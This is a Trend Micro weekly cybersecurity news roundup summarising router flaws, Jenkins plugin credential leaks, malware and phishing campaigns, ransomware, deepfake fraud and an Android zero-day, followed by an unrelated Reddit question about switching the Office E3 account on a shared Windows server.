Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how music festival goers need to be on guard for phishing attacks when trying to find a lost iPhone. Also, read how Trend Micro researchers went public with their findings on a zero-day vulnerability impacting the Android mobile operating system. 

Read on:

Finding a Better Route to Router and Home Network Security

New research published reveals that many of the home routers sold in the US today are still missing basic protections. Read on to learn about how your router is exposed to hackers, what attacks are possible and how to protect your router and smart home with Trend Micro’s help.

Hiding in Plain Text: Jenkins Plugin Vulnerabilities

Jenkins, a widely used open-source automation server that allows DevOps developers to build, test, and deploy software efficiently and reliably, recently published security advisories that included problems associated with plain-text-stored credentials. Vulnerabilities that affect Jenkins plugins can be exploited to siphon off sensitive user credentials.

Big Tech Companies Meeting with U.S. Officials on 2020 Election Security

Facebook, Google, Twitter and Microsoft met with government officials in Silicon Valley on Wednesday to discuss and coordinate on how best to help secure the 2020 American election, kicking off what is likely to be a marathon effort to prevent the kind of foreign interference that roiled the 2016 election.

Glupteba Campaign Hits Network Routers and Updates C&C Servers with Data from Bitcoin Transactions

Trend Micro recently caught a malvertising attack distributing the malware Glupteba, an older malware that was previously connected to a campaign named Operation Windigo and distributed through exploit kits to Windows users. This blog discusses features of this malware and security recommendations to avoid this kind of attack.

Spam Campaign Abuses PHP Functions for Persistence, Uses Compromised Devices for Evasion and Intrusion

A Trend Micro honeypot detected a spam campaign that uses compromised devices to attack vulnerable web servers. After brute-forcing devices with weak access credentials, the attackers use them as proxies to forward a base64-encoded PHP script to web servers, which then sends an email with an embedded link to a scam site to specific email addresses.

Google, Trend Micro, IBM’s Red Hat ID’d Among Top Container Security Vendors

Container security presents a hot growth opportunity for the channel, with the global market expected to more than quadruple by 2024, reaching nearly $2.2 billion. North America is expected to account for the highest market share through 2024.

IPhone Theft Leads to Stolen Apple Credentials Through Phishing Attack

Of the hundreds who had their cellphones stolen or lost during the Lollapalooza music festival, one woman’s attempt to find her iPhone led her to a phishing scheme that stole her credentials. Like a regular phishing scheme, she received a seemingly legitimate text message with a link to what looked like the Find My iPhone webpage, but realized they were fake after she entered her credentials.

Ransomware Attacks Hit Taiwan Hospitals and Dubai Firm

Two notable ransomware attacks targeted several hospitals in Taiwan and a contracting company in Dubai last week. The ransomware attack in Taiwan prevented several hospitals from accessing their information systems, while the attack in Dubai froze a company’s systems.

Trend Micro, AWS Deliver Transparent, Inline Network Security for Enterprise Clouds

Trend Micro is taking new steps to help enterprises using Amazon Web Services to better deliver network security for cloud and hybrid operations.  IDN looks at Trend Micro Cloud Network Protection, along with the firm’s new XDR solution.

Sextortion Scheme Deployed by ChaosCC Hacker Group Demands US$700 in Bitcoin

A recently discovered email scheme reportedly deployed by a hacking group called ChaosCC claims to have hijacked recipients’ computers and recorded videos of them while watching adult content. This sextortion scheme reportedly attempts to trick recipients into paying US$700 in bitcoin.

Unusual CEO Fraud via Deepfake Audio Steals US$243,000 From U.K. Company

This fraud incident used a deepfake audio, an artificial intelligence (AI)-generated audio, and was reported to have conned US$243,000 from a U.K.-based energy company. According to a report, in March, the fraudsters used a voice-generating AI software to mimic the voice of the chief executive of the company’s Germany-based parent company to facilitate an illegal fund transfer. 

Zero-Day Disclosed in Android OS

Yesterday, Trend Micro researchers went public with their findings on a zero-day vulnerability impacting the Android mobile operating system after Google published the September 2019 Android Security Bulletin, which didn’t include a fix for their bug. The vulnerability resides in how the Video for Linux (V4L2) driver that’s included with the Android OS handles input data.

Container Security in Six Steps

Containers optimize the developer experience. However, as with any technology, there can be tradeoffs in using containers. This blog contains sex steps developers can follow to minimize risks when building in containers.

Are you well-versed on Trend’s suggestions for protecting your router and smart home from hackers? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: New Zero-Day Vulnerability Findings and Mobile Phishing Scams appeared first on .

Read more:

Office, change default account tied to E3 subscription


I apologize if I'm on the wrong subreddit. I'm unsure where to go.

I had to delete an Office E3 account and create a different one (still E3). In windows server 2016, in any Office application, even though I disconnect the old account to which the subscription was tied and reconnect with the newly created account, once the application is closed and reopened, the old account still shows up on top right of the window (with a yellow triangle).

To be specific, I have 3 users with their respective E3 subs working with remote desktop on that server. I'm using local profiles (non-Microsoft account).

How do I change that behavior? I don't understand it.

submitted by /u/safhjkldsfajlkf [link] [comments]

Read more: